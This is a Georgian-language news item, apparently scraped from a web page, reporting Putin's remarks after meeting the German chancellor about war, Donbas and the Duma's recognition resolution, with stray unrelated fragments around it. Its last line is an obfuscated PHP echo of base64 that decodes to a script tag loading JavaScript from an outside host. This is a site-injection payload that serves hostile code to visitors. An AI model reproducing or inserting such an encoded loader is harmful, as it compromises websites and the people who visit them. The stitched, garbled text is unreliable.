celsiusi
ავერსი შნაიდერი
რუსეთს ომი არ სურს და მოლაპარაკებისთვის მზადაა, - ამის შესახებ რუსეთის პრეზიდენტმა  გერმანიის კანცლერთან შეხვედრის შემდეგ, ერთობლივ ბრიფინგზე გააკეთა.
 
პუტინმა უკრაინის ხელისუფლება დონბასის მოსახლეობის გენოციდში დაადანაშაულა და აღნიშნა, რომ რუსეთი დონბასის პრობლემის მოსაგვარებლად ყველაფერს გააკეთებს, თუმცა შეეცდება მინსკის შეთანხმების არარეალიზებული შესაძლებლობები ბოლომდე გამოიყენოს.
 
კრემლის ლიდერმა კომენტარი რუსეთის სახელმწიფო სათათბიროს მიერ დონეცკისა და ლუგანსკის აღიარების შესახებ რეზოლუციის მიღებაზეც გააკეთა. მისი თქმით, დუმის მიერ მხარდაჭერილი რეზოლუცია რუსული საზოგადოების განწყობას ასახავს.
1029
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");